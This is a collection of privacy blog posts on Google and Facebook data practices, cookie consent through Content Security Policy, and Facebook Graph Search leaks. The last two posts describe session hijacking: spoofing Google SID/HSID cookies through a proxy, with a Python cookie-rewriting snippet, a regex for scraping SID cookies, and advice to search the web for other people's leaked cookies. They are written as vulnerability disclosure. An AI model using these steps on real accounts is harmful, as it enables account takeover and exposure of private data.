About Vincent Toubiana

I'm an IT Expert at CNIL (the French DPA) and a former NYU PostDoc who maintains and develops the TrackMeNot extension. On this blog I'll express my personal opinion about search engines and how they handle privacy issues.

The missing clauses in Google’s “Customer Match”

In September Google announced “Customer Match”, a new tool for advertisers to target their existing customers using their email addresses. “Customer Match” is almost like Facebook’s “Custom Audiences”, but Google and Facebook seem engaged in “a privacy race to the bottom” and Google may have taken the lead.

Targeting email addresses

Advertisers aim to target both prospects and existing customers. While remarketing offers them the opportunity to target potential buyers, advertisers were so far unable to differentiate between their existing customers and new prospects. They also could not target their “loyal” clients (i.e. those who have subscribed to a loyalty card) because there is no link between the cookie IDs assigned to their browser by ad networks and their loyalty card number, or even their online customer account. “Custom Audiences” and “Customer Match” (hereafter “customer targeting”) create a bridge between the email addresses used to create a “Best Buy” account or a CVS loyalty card and Google and Facebook accounts.

Via “customer targeting”, advertisers will be able to pull the information they gathered about your shopping habits and leverage it to target you on Facebook and on Google. Advertisers won’t directly attach the ads they want to show you to your address. Instead, they will create “audiences”: groups of their customers’ email addresses. They will send those email addresses, hashed, to Facebook (or Google), which will check whether the hashed addresses match those of registered users.

Technically, Facebook does not see the email address, just the hash. So if you’re not in their user database, they will not be able to know that you’re a “Best Buy” customer. That being said, this technical guarantee may not be sufficient considering the computational resources of giants like Google and Facebook, which could generate many hashes to brute-force the hashed addresses and recover the lists of customers. In fact, in another context Google seems to admit this: it requires that Google Analytics users not send hashed identifiers like email addresses or phone numbers.

Therefore the only guarantees are contractual; they are the commitments that Google and Facebook make when they receive email addresses (or phone numbers). Facebook and Google commit to not retrieving the email addresses of people who are not registered to their services. Similarly, their contractual clauses prevent them from keeping those lists of hashed identifiers for more than a week (which would still be more than enough time for them to break most of the hashes).

Facebook ToS

Facebook’s Terms of Service are quite constraining for Facebook itself, as they more or less prohibit Facebook from doing anything with the hashed email addresses other than using them to help an advertiser reach its audience. Therefore, Facebook cannot add information to the profiles of its users. In fact, Facebook specifically forbids appending “Custom Audience” data to users’ profiles. Furthermore, Facebook won’t let an advertiser target the audience of another advertiser. For instance, “Target” should not be able to target “Best Buy” customers. Facebook adopts a data processor position with respect to Custom Audiences, the advertiser being the data controller.

Excerpt of “Custom Audience ToS”: https://www.facebook.com/ads/manage/customaudiences/tos.php


Google Customer Match

Google took another approach with its service. Google did not include clauses preventing it from appending “Customer Match” data to users’ profiles. The restrictions only concern the list of email addresses; there is no restriction on the use of the list of matched profiles, which can therefore be used by Google.

“Customer Match” conditions from https://support.google.com/adwords/answer/6276125


In fact, Google implicitly admitted that these data will be appended to user profiles when it modified its Privacy Policy in August to include data obtained from partners in Google Account data. While the change went unnoticed at the time, it became clearly more significant after “Customer Match” was announced.

Change made to Google’s privacy policy on August 19th


Consequences of Google’s posture

Google’s decision to include “Customer Match” data in its user accounts will impact users’ privacy and also competition between advertisers.

  • Since the data will be included in the account, Google will have a more comprehensive view of its users, which is a big step toward merging offline and online data (also known as data onboarding). This may have significant negative impacts as it puts Google at the center of all these data flows… until Facebook announces its riposte.
  • On the upside, this could be beneficial for transparency, because users could be made aware of the advertisers targeting them if Google shows these data on privacy dashboards (that’s a big if).
  • However, because Google is a data controller with respect to “Customer Match”, advertisers may be reluctant to share information about their customers, knowing that it could potentially be reused by competitors or by Google itself. Not only could Google share these data with other advertisers, allowing competitors to target each other’s audiences to stir up demand and thus prices, but Google could also be tempted to use the data for its direct benefit.


Thanks to Armand Heslot for providing feedback on a draft.

Implementing cookie consent with “Content Security Policy”

In this post I briefly explain how “Content Security Policy” could be used to enforce the cookie consent regulation by blocking third parties content.

Cookie Consent

EU cookie regulation requires website editors to obtain the informed consent of visitors before setting cookies. Therefore, a website should first check that it has consent before dropping its own (unnecessary) cookies, and so should the third parties called by the website. While it’s fairly simple for a first party to check that it has obtained consent (e.g. by storing the consent in a cookie), third parties are in a different situation because they cannot read the first-party cookies to deduce whether consent has been granted.
Therefore the responsibility sort of shifts to the first parties, which are in a position to inform visitors and obtain consent; yet they have to prevent third parties from setting cookies as long as consent has not been obtained. Tag managers are elegant solutions that can be deployed to do that. A less elegant solution is to rely on “Content Security Policy” to prevent the browser from loading external resources that set cookies.

Overview of Content Security Policy

A “Content Security Policy” is a “declarative policy that lets the authors (or server administrators) of a web application inform the client about the sources from which the application expects to load resources”. This policy can be viewed as a white list of resources that the browser may load when requesting a page. Content security policies can be conveyed in two forms: either through an HTTP header or in an http-equiv meta tag in the header of the HTML document.
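For illustration, here is the same (placeholder) policy expressed in both forms; the domain is invented:

```html
<!-- 1) HTTP header form (sent by the server):
       Content-Security-Policy: script-src 'self'; img-src 'self' *.example.org
     2) Equivalent meta tag form, placed in the document's head: -->
<meta http-equiv="Content-Security-Policy"
      content="script-src 'self'; img-src 'self' *.example.org">
```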

Implementation of the policy

To comply with the cookie consent regulation, a website may simply use a “Content Security Policy” to block any third party from loading content, and subsequently setting cookies, as long as consent has not been granted. Notice that this solution is not specific to cookies; it blocks all types of resources from being loaded, thus effectively preventing all types of fingerprinting by third parties.
A quick “cookie consent” implementation is to check, when a GET request is received, whether the “consent” cookie is set, and to adapt the “Content-Security-Policy” accordingly: if consent has not been granted, block all third parties; otherwise, serve the usual policy.
The easiest implementation is to use JavaScript to insert the http-equiv meta tag in the HTML (although this is not recommended); website editors can just add the following JavaScript tag in their pages and that should do the trick:

if ( document.cookie.indexOf('hasConsent') < 0 ) {
 var hostname = window.location.hostname;
 // strip a leading "www." (4 characters) so the wildcard matches all subdomains
 if (hostname.indexOf("www.") === 0) hostname = hostname.substring(4);
 var meta = document.createElement('meta');
 meta.httpEquiv = "content-security-policy";
 meta.content = "script-src 'self' 'unsafe-inline' *." + hostname + "; img-src *." + hostname;
 document.head.appendChild(meta);
}

A slightly more complicated solution is to set the HTTP header. The code is fairly similar, but the complexity depends on the type of server you’re running. If you’re using PHP, you could do it like this:

if (!isset($_COOKIE["hasConsent"])) {
 $allowed_hosts = "*.unsearcher.org";
 // no consent yet: restrict scripts and images to the first party
 header("Content-Security-Policy: script-src 'self' 'unsafe-inline' " . $allowed_hosts . "; img-src 'self' " . $allowed_hosts);
}

Browser Support

Content Security Policy is still a working draft, so the feature is not supported equally by all browsers. As far as I can tell, Chrome and Safari implement all the required features, including support for the http-equiv tag. Firefox enforces policies that are set through the header, but there is currently no support for the http-equiv tag. Finally, Internet Explorer offers only very limited support of CSPs through the iframe sandbox property.


I’ve used the Burp proxy to preview what websites would look like with content security policies blocking third parties; here are the results:


Content-Security-Policy: script-src 'self' 'unsafe-inline' *.lemonde.fr *.lemde.fr; img-src *.lemonde.fr *.lemde.fr

Content-Security-Policy: script-src 'self' 'unsafe-inline' *.nytimes.com *.nyt.com; img-src *.nytimes.com *.nyt.com

Content-Security-Policy: script-src 'self' 'unsafe-inline' *.slashdot.org *.fsdn.com; img-src *.slashdot.org *.fsdn.com



This solution is far from perfect, mainly because it is not supported by all browsers. Yet it provides a simple way for website editors to block third-party resources until consent is obtained. It is complementary to the tags provided on CNIL’s website, which can be used to obtain consent before setting Google Analytics first-party cookies.

Impact of Google privacy policy on web tracking

Google’s most important privacy policy change happened almost two years ago. The change was announced as a clarification of the policies that would mainly be used to simplify and improve services. Now that the changes are effective, it is interesting to observe the consequences of the new policy and what has changed. In this blog post I focus on Google’s tracking capabilities and show that the changes allow Google to significantly improve the way it tracks users on the web.

The claim about DoubleClick cookie information

One of the few protective claims Google made in its policy was that “[they] will not combine DoubleClick cookie information with personally identifiable information unless we have your opt-in consent”. Some understood that Google would not combine information from the Google Account with information from the DoubleClick ad network, but that was not the case.

Using information from the Google profile

As a matter of fact, Google has so far combined many pieces of information from its ad network with information obtained from Google profiles. Your age and gender have already been shared with DoubleClick advertisers for many months now, as shown on the Google Ads Settings page. At the beginning, these data were shared on an opt-in basis through the “+1 personalization” page. It was not obvious that this page controlled how information from your profile was shared with advertisers, as this was only mentioned as “+1 and other profile information”.

This page shows part of the information advertisers can use to target you.

The “+1 personalization” page (see below) was removed when Google announced “ad endorsement”, and the URL of the page now redirects to the ad-endorsement page. As a matter of fact, it is no longer possible to opt out of web ads based on your Google profile without opting out of all interest-based ads.

This page was buried in Google+ settings and was removed when Shared Endorsement was announced.

This change came with no announcement, because the privacy policy only prevents Google from combining PII from the Google profile with DoubleClick cookie information.

Ad customization based on visited websites

The policy does not prevent Google from using your visits to DoubleClick-affiliated websites to target your Google profile. As a matter of fact, your Google account can be retargeted by DoubleClick-affiliated websites you visited. This feature, called Remarketing Lists for Search Ads, lets advertisers retarget previous visitors on Google Search.

Technically, Google cannot directly recognize when a user has visited a website affiliated with DoubleClick because the domains associated with the cookies are different. When you’re doing a search on Google, Google reads only cookies attached to the “google.com” domain, whereas on the Google Display Network (i.e. the set of websites with DoubleClick ads) cookies are attached to the “doubleclick.net” domain. Google knows the DoubleClick cookie ID of people who visited a website on the Display Network, but it does not know their Google ID. This is a problem for Google because when you do a search, you do not reveal your DoubleClick ID but just your Google ID; so Google cannot know if you’ve visited a website which does retargeting.

To solve this, Google redirects your browser from the doubleclick.net domain to the google.com domain. When you visit a website which wants to retarget you, DoubleClick redirects you to the google.com domain and Google adds your Google ID to the list of people who visited the advertiser’s website. Next time you do a search, Google will recognize your Google ID and retarget you with ads for the website you visited. The figure below explains how Google records that a user visited the website ABC (you can capture the actual frames on worldstore.co.uk).
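The redirect trick can be sketched as a toy simulation; every name and identifier below is invented, since the actual endpoints and parameters are not public:

```javascript
// One browser, known under a different cookie ID on each domain.
const doubleclickCookies = { browser1: 'dc-123' };  // doubleclick.net cookie
const googleCookies = { browser1: 'g-456' };        // google.com cookie
const remarketingLists = {};                        // advertiser -> Google IDs

// Step 1: the DoubleClick tag on advertiser ABC's site answers with a
// redirect toward a google.com URL that names the remarketing list.
function doubleclickTag(browser, advertiser) {
  return { browser: browser, list: advertiser };
}

// Step 2: the browser follows the redirect; google.com reads its *own*
// cookie and files the Google ID under the advertiser's list.
function googleEndpoint(redirect) {
  const googleId = googleCookies[redirect.browser];
  if (!remarketingLists[redirect.list]) remarketingLists[redirect.list] = new Set();
  remarketingLists[redirect.list].add(googleId);
}

googleEndpoint(doubleclickTag('browser1', 'ABC'));
// A later search on google.com only reveals the google.com cookie ('g-456'),
// but that is now enough to retarget this visitor for advertiser ABC.
```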

Through this process, Google associates the list of websites affiliated to the Google Display Network (that is, carrying a DoubleClick tag) that you visited with your Google ID. Consequently, part of your web browsing history (the part containing websites which do remarketing) is actually combined with your Google profile, and you cannot review it. Notice that Google never offered a way to know which of the websites you visited try to retarget you; but while Google could previously have claimed that your browsing history was only associated with your “anonymous” DoubleClick ID, it is now attached to your personal Google account.

Summary of what Google can combine with DoubleClick

To summarize, Google cannot combine personally identifying information from your Google account with your DoubleClick cookie information, yet it can:

– Use information from your Google account (age, gender, and probably very soon a list of your interests) to personalize the ads you see on DoubleClick-affiliated websites;
– Link visits on DoubleClick-affiliated websites to your Google profile and retarget you when you do a search on Google.

In the end, Google’s privacy policy with regard to advertising is well summarized on this page:

  • “[They] don’t share personally identifiable information with advertisers.
  • [They] don’t allow advertisers to show ads based on sensitive information, such as those based on race, religion, sexual orientation, health or sensitive financial categories.”

In the next post, I consider how Google combines information from the Google profile and DoubleClick with data obtained through Google Analytics.

Facebook may violate the FTC settlement in a few days

Update: Facebook started to show the announced prompt asking for user consent.

Almost a year after it removed the option for 90% of its members, Facebook informed the remaining 10% on Wednesday that it will remove the “Who can search my timeline by name” setting in a few days. Removing this setting is likely a violation of the 2011 FTC settlement.

Timeline concealed to the public

A month ago Facebook announced that it would prompt users to get their consent before removing the setting [1], but it finally decided to just inform users with an email and a very short notice displayed above the News Feed.


In the mail sent to its members, Facebook argues that when it created this setting, “the only way to find [them] on Facebook was to search for [their] specific name. Now, people can come across [their] Timeline in other ways: for example if a friend tags [them] in a photo, which links to [their] Timeline, or if people search for phrases like “People who like The Beatles,” or “People who live in Seattle,” in Graph Search”. However, I’m confident that some users – including me – are not tagged in any public photo, do not like public content, and have no friend whose “friends list” is public.

The Timelines of these users will not appear in public Graph Search results, and there is no public link that could be used to find them. As a matter of fact, people who are not my friends (or friends of friends) can’t even know whether I have a Facebook account. As of today, the only way to find my Facebook Timeline is to test the 1.2 billion user ID numbers. In addition to being time-consuming, this exhaustive search would violate Facebook’s Terms of Service.

Private vs Nonpublic

A Timeline page is public because any user can load its content, but Timeline URLs (i.e. usernames) are not public since not everyone can find them: without the search functionality, it is not possible to retrieve the Timeline associated with a specific user. Timeline URLs are like unlisted phone numbers or Google Docs shared with “anyone with the link”. These documents may not be seen as private, but I would not define them as public (i.e. I’d be unpleasantly surprised to see them used in an endorsed advertisement). I do not claim that Timelines are private, only that they are “nonpublic user information”.

Why Facebook could violate the FTC settlement

The FTC settlement does not focus on users’ private information but covers all nonpublic user information (e.g. a user ID to which access is restricted by a privacy setting). Indeed, Section II-A of the 2011 settlement requires that Facebook, “prior to any sharing of a user’s nonpublic user information by [Facebook] with any third party, which materially exceeds the restrictions imposed by a user’s privacy setting(s), shall […] obtain the user’s affirmative express consent”.

Facebook will not only remove the possibility to select who can look up timelines, it will also reset the setting to its default value, “Everyone”. Hence, Facebook will modify the settings of users who had set it to a more restricted audience. Obviously, the two-line message Facebook displayed and the email it sent to the affected members do not offer a valid way to obtain affirmative express consent. So Facebook will certainly violate the FTC settlement in a few days.

[1] Coincidentally, Facebook made this announcement about 5 hours after I tweeted that they should get an informed consent.


Your hidden friends, betrayed by their likes

Graph Search as a privacy tool

According to Facebook, Graph Search not only helps people find information about their friends, it also helps them know what information they reveal about themselves. I find this objective questionable, especially in France where many people are still not aware that Graph Search even exists [1] and yet have their profiles searchable by anyone in the US. Still, Graph Search is certainly very useful and educational about what could go wrong with tagging and shared content.

The issue of the Friend List

When Facebook announced Graph Search in January, I was surprised by their decision not to show friends lists that could be recomposed by browsing timelines. Recomposing part of someone’s friends list was time-consuming but possible if you spent time scrolling down the timeline.

Last July’s update of Graph Search makes it even simpler to retrieve the friends list of people who hide it. Indeed, Graph Search now allows you to search for who liked or commented on photos. Since some content is only visible to my friends, only they can comment on or like my pictures. Having a list of people who liked or commented on my photos is like having a list of the friends with whom I share things on Facebook. Some people that I do not know have commented on my photos, but that’s a negligible fraction.


Unwanted side effects

Surprisingly, it seems that you can even know that someone liked a photo you don’t have access to. Indeed, in some circumstances, you cannot see which picture has been liked; you only know that someone liked a picture (see below). This goes against Facebook’s claim that Graph Search only gives you access to information you already had.

Update: In fact, the person who liked the picture is not searchable but she appears in the search results because she liked a public photo.


The picture liked by the first person is accessible; the one liked by the second is not

Another annoying effect is that queries like “People who liked photos by me” return a list of people with whom I’m no longer friends. And it’s pretty easy to spot these people because they are systematically at the end of the result list.

How bad is it?

To measure the fraction of the friends list that could be retrieved through Graph Search, I counted the number of results returned when I searched for:

  • Q1: “People who liked photos by X”
  • Q2: “People who commented on photos by X”
  • Q3: “People who uploaded photos liked by X”
  • Q4: “People who uploaded photos of X”

Unfortunately, Graph Search does not (yet?) support ‘OR’ queries, so there is no easy way to quantify the overlap between these four queries. I report the numbers of confirmed retrieved friends (using the “mutual friend” filter) and, in parentheses, the total number of retrieved people, which also includes former friends. I compare that to the number of friends I have (and I thank my friends who did not hide their friends lists).

X    Q1       Q2       Q3       Q4       N Friends   Ratio
me   59 (73)  43 (45)  42 (54)  19 (20)  207         28.50%
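For the record, the ratio column is simply the best single query (Q1, 59 confirmed friends) over the size of my friends list:

```javascript
// 59 confirmed friends retrieved by Q1, out of 207 friends in total.
const confirmed = 59;
const totalFriends = 207;
const ratio = confirmed / totalFriends; // ≈ 0.285, i.e. 28.50%
```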

I ran the same tests on a few friends and obtained similar results [2]; queries Q1 and Q3 are in general the most effective. On average, Graph Search returns 30% of friends, plus some former friends. I guess I could retrieve up to 40-50% by combining the four queries. It’s problematic because many people assume that their friends lists are safe, but this safety goes away when they share likeable photos or when they like photos.

Since “Like” visibility is public, you can even retrieve some friends of people with whom you have no connection. I can imagine many circumstances where having your list of friends publicly available is very problematic.

What can you do?

Unfortunately, you cannot prevent your friends from liking content you share with them. Likes are not like tags or comments: they cannot be removed. The only current solution is to not share “likeable” content or to ask people not to like it, but that’s very counterintuitive on Facebook. In the end, you can only hide friends who don’t “like” you.

Another solution is to obfuscate the list of people who liked your pictures. I probably rely too much on obfuscation, but asking people you don’t know to like your photos is currently the only technical solution to prevent stalkers from quickly retrieving your friends.

Thanks to my stalked friends who do not share their friends lists; they motivated this post. Thanks to those who do share their lists; they helped me make this post relevant.

[1] If you have not yet enabled “Graph Search”, I recommend you do so. See http://www.fredzone.org/comment-activer-le-graph-search-de-facebook-929

[2] I’ll post more results when I get their consent.

Facebook Graph Search: Showing what is not Shared

When Facebook announced Graph Search, they emphasized that they designed it with privacy in mind, and yet made two different statements. First, M. Zuckerberg said that it’ll give access only to “things that people have shared with you”, while T. Stocky said that “[you] can only search for what [you] can already see on Facebook”.
I define the “content I share with you” as the content you can see on my timeline, which is in fact a subset of the content you could see about me on Facebook. But Facebook has a different definition and considers “content shared” as everything about me that is visible, even if it normally requires a considerable effort to find it.

Finding pictures with Graph Search

Facebook made it clear that hiding photos on your timeline is no longer enough to prevent people from seeing them. With graph search, it’s now very simple to find all the photos of someone that are visible to you.
For instance, if one of your friends is tagged in pictures that he decided to remove from his timeline, these “hidden” photos will appear in Graph Search if you have access to them.
It was already possible to find “hidden” pictures a friend was tagged in, but it required a considerable amount of time and effort: you had to go through the list of all his friends and check their pictures in case your friend might appear in some of them. Unless you were really creepy, your friends were safe to assume that most of their “hidden” pictures would not be viewed by you. That’s no longer the case, and to control who can see your “hidden” pictures you’ll have to delete tags or ask your friends to limit the pictures’ visibility.

Removing tag is not the solution

Tags are not only a feature used to annotate content; they are also used to know when someone comments on a picture you appear in. If you delete the tag, you lose the ability to quickly know how people react to a photo. Not removing a tag is different from sharing a picture. Assuming that people want to share every picture they’re tagged in is wrong, especially when there’s a “share” button that allows them to do precisely that.
Unlike posts on your timeline, tags don’t have to be reviewed before they appear in Graph Search. To control photos of you that will appear in graph search, you have to frequently visit Facebook and remove unwanted tags. You have no option to proactively control your image on Facebook other than relying on your friends to not tag you without your consent.

The case of friends list

Strangely, Facebook did not adopt the same definition of “sharing” for the friends list. Assuming we’re friends: if you’ve decided to hide your friends list from your timeline, I can try to recompose it by visiting each of your friends’ timelines and checking whether you appear as a mutual friend. It would require knowing some of your friends first, but that’s fairly easy if they posted something on your timeline. By iterating this process, I could retrieve a subset of your friends. Like photos you are tagged in, this subset is presumably shared by you, but it won’t appear if I search for the list of your friends.
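The recomposition process amounts to a small graph walk; here is a toy sketch over an invented friendship graph (all names are placeholders):

```javascript
// Visible friends lists, as they would appear on each timeline.
// 'target' hides their own list, yet shows up in their friends' lists.
const friendsOf = {
  target: null,              // hidden list
  anna: ['target', 'ben'],
  ben: ['anna', 'carl'],
  carl: ['ben', 'target'],
};

// Starting from one known friend, walk the visible lists and collect
// every user whose list contains the target.
function recompose(target, seed) {
  const found = new Set();
  const seen = new Set();
  const queue = [seed];
  while (queue.length > 0) {
    const user = queue.shift();
    if (seen.has(user)) continue;
    seen.add(user);
    const list = friendsOf[user];
    if (!list) continue;                   // this user hides their list too
    if (list.includes(target)) found.add(user);
    queue.push(...list.filter((u) => u !== target));
  }
  return found;
}

const partialList = recompose('target', 'anna');
// partialList holds 'anna' and 'carl': a subset of the hidden friends list.
```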

Google’s Ad Targeting under the new Privacy Policy

Google’s new privacy policy will be effective starting March 1st. The Electronic Frontier Foundation (EFF) suggests deleting your Web Search History, and I strongly recommend following this advice because:

1) The searches that have been recorded in your Web Search History before March 1st will be subject to this policy [1].
2) Advertisers could target ads based on your browsing interests and interests inferred from your Web Search History.

The Good Points

First, I have to say that Google did a remarkable job advertising the new policy: notifications are everywhere. I don’t remember any previous policy update being so heavily advertised and commented on.

Another good point is that many privacy policies have been merged into one. It is no longer necessary to have a dozen tabs open to get a good view of the policy. However, you still need an extra tab open on the FAQ page with the definitions required to understand the policy. Google could have used the empty space in the right column to display these definitions (like search result previews).


The really bad one

So much for the good points; now let’s discuss the policy itself. The bottom line is that this policy would allow advertisers to target you based on your web search profile and other interests you expressed in your emails or through your use of Google services. And this list of interests can be combined with the list of interests Google built based on your DoubleClick cookie.

Google does not need your opt-in consent to combine your web search profile with your DoubleClick cookie information. Starting March 1st, Google could adopt a solution similar to the one deployed by Microsoft to target ads based on your search interests, although a sentence in the policy seems to prevent such use of your data:

“We will not combine DoubleClick cookie information with personally identifiable information unless we have your opt-in consent.”

In fact, it means that your DoubleClick cookie will not be linked to your personally identifiable information. So Google cannot put your name in front of the list of interests inferred from your browsing behavior, and will not put your name (or any other PII) in the ads you see. Because your Web Search History is likely to be unique, it identifies you and therefore cannot be combined with your DoubleClick profile [2].

But your search profile (i.e. the list of interests inferred from your search history) is unlikely to be unique and therefore does not identify you, so Google can combine it with your DoubleClick cookie information [2]. I believe they could also include some of the search results you clicked on to retarget you.

Similarly, your age, gender and interests expressed during Gtalk and Gmail discussions (or any other interest that Google could infer but that you would not be the only one to express) could be associated with your DoubleClick cookie. If you have any suggestion on how to deal with these data, do not hesitate to share it.

[1] See Google Policy FAQ: “Our new Privacy Policy applies to all information stored with Google on March 1, 2012 and to information we collect after that date.”
[2] Google defines Personal information as information “you provide to us which personally identifies you, such as your name, email address or billing information, or other data which can be reasonably linked to such information by Google”.

A list of Google services vulnerable to Session hijacking

After finding an information leak in Google Search, I was curious to see whether other pieces of information could be gleaned from other Google services. To verify this, I visited my Google Dashboard, replaced my SID cookie and clicked on all the HTTP services that were listed.
My first attempt failed, as I was systematically redirected to the account page where I was asked to enter my password. I then tried to also spoof the HSID cookie (also sent in clear text), but because the HSID cookie is an HttpOnly cookie [1], it cannot be modified by a script or by the user: the cookie can only be set by the server.

Spoofing an HTTPOnly cookie

The best solution I found was to install a local proxy to intercept the HTTP traffic and then modify the cookies (I recommend the free edition of Burp, which does a good job). It is then quite simple to replace the HSID cookie in the outgoing requests.
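
Conceptually, all the proxy has to do is rewrite the Cookie header of each outgoing request. A minimal sketch of that rewriting step (the cookie values are made up; an interception proxy such as Burp does this for you):

```python
from http.cookies import SimpleCookie

def replace_cookies(cookie_header, overrides):
    """Rewrite a Cookie request header, substituting captured values
    (e.g. a victim's SID and HSID) for our own."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    for name, value in overrides.items():
        jar[name] = value
    # Re-serialize as a single Cookie header value.
    return "; ".join(f"{name}={morsel.value}" for name, morsel in jar.items())

# Our own cookies, as the browser would send them.
header = "SID=my_own_sid; HSID=my_own_hsid; PREF=abc"
spoofed = replace_cookies(header, {"SID": "victim_sid", "HSID": "victim_hsid"})
print(spoofed)  # SID=victim_sid; HSID=victim_hsid; PREF=abc
```
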
This time it worked: I was able to log into several services with the spoofed account:

  • Google Alerts: I was able to view and edit the mail alerts that were configured for the spoofed account.
  • Google Social Content: this service lists all your Gtalk contacts (that is, most of the people you have chatted with at least a couple of times).
  • Google Contacts: this is the Gmail contacts manager; it allows you to view, edit and create Gmail contacts. Quite useful if you want a list of people to spam. An attacker could also attempt to replace a contact's mail address with their own.
  • Google Reader: you could see and edit RSS subscriptions.
  • Google Maps: you could see the maps associated with the spoofed account.

There might be other vulnerable services, but I think this list already covers the most important ones, and each of the listed services is likely to expose sensitive information.

Design flaws

Spoofing an unsecured cookie to hijack a session is nothing new. Nevertheless, two design flaws make HSID and SID cookie spoofing more critical:

  • These cookies can be used to provide an access to multiple services: when Google created these services, it did not assign a specific cookie for each of them. Therefore a single pair of cookies provides an access to all these services.
  • SID cookies remain valid even after the user logs out: if users think their session has been compromised, there is nothing they can do to revoke it. It seems this was already pointed out 4 years ago.
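
The first flaw is easy to see by building the requests by hand: the very same cookie pair is attached to every service URL. A sketch (the cookie values are invented and the paths are illustrative):

```python
import urllib.request

# One captured (SID, HSID) pair -- hypothetical values.
cookie_pair = "SID=victim_sid; HSID=victim_hsid"

# A few of the HTTP services reachable from the Dashboard.
services = [
    "http://www.google.com/alerts",
    "http://www.google.com/reader/view/",
    "http://maps.google.com/maps/ms",
]

# No per-service cookie exists: the same pair unlocks every request.
requests = [
    urllib.request.Request(url, headers={"Cookie": cookie_pair})
    for url in services
]
for req in requests:
    print(req.full_url, req.get_header("Cookie"))
```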


Google is working on these issues and they should be fixed soon (users are already redirected to encrypted search [2]). A next step would be to check whether other major Web service providers have a better cookie policy.

[1] Jeff Atwood, “Protecting Your Cookies: HttpOnly”, http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html
[2] Evelyn Kao, “Making search more secure”, http://googleblog.blogspot.com/2011/10/making-search-more-secure.html

Searching session cookies and click-streams

In our paper on Google's session cookie information leakage, Vincent Verdot and I described how to capture SID cookies on a shared network and run the attack with Firesheep (see the previous post).

Nevertheless, there are other ways to capture such cookies. For instance, one could use malware to capture search traffic, but the simplest solution remains to search for SID cookies.

Redirecting traffic

Using malware to redirect the traffic of infected computers through a proxy controlled by the attacker would allow session cookies to be captured. Such an infection was recently detected by Google, which displayed a warning banner on its search page [1]. In that particular case, the redirection of Google traffic was merely a side effect that triggered the malware detection.

According to Google, a couple of million computers [1] were infected by this malware. Attackers could have captured a significant number of session cookies and run the attacks described in our paper.

Googling for cookies

The simplest solution to find SID cookies is to search for them. Typing the right query in Google provides a list of pages where people have published captured HTTP traffic, including SID cookies (this also works with Yahoo!).
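
Scraping candidate cookies out of such a paste takes only a few lines; a sketch over a made-up capture (the cookie values are invented):

```python
import re

# Hypothetical snippet of pasted HTTP traffic found via a search engine.
dump = """\
GET /search?q=test HTTP/1.1
Host: www.google.com
Cookie: PREF=abc; SID=DQAAAKcExampleOne; HSID=AxZ9
Cookie: SID=DQAAALmExampleTwo
"""

# SID values are long tokens; the \b keeps HSID= from matching too.
sid_pattern = re.compile(r"\bSID=([A-Za-z0-9_\-]+)")
print(sid_pattern.findall(dump))  # ['DQAAAKcExampleOne', 'DQAAALmExampleTwo']
```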

If you replace your SID cookie with one of the cookies listed on these pages, you will receive the same personalized results as its owner. From these results you can quickly extract a list of visited results, Gmail contacts and Google+ acquaintances.

Not all these results contain full SID cookies, and some of the listed SID cookies may have already expired, but this simple search should provide many valid cookies with which to test the flaw. I've written a Chrome extension to simply replace the SID cookie for the "google.com" domain and quickly test different accounts. Once installed, click on the red button in the upper right corner, paste the cookie value and click save.
On Firefox you could use the Web Developer extension to edit cookies (it does not seem to work on Firefox 5.0).

Linking data and PI

By publishing their (apparently innocuous) cookies, users indirectly published part of their click-stream and associated it with their email address. They thus established a public record of having visited these URLs [2], and this record is now linked to their name. From there, their full anonymized click-stream (not limited to visited search results) could be de-anonymized by a tracking ad-network.


[1] Damian Menscher, “Using data to protect people from malware”, http://googleonlinesecurity.blogspot.com/2011/07/using-data-to-protect-people-from.html
[2] Arvind Narayanan, “There is no such thing as anonymous online tracking”, http://cyberlaw.stanford.edu/node/6701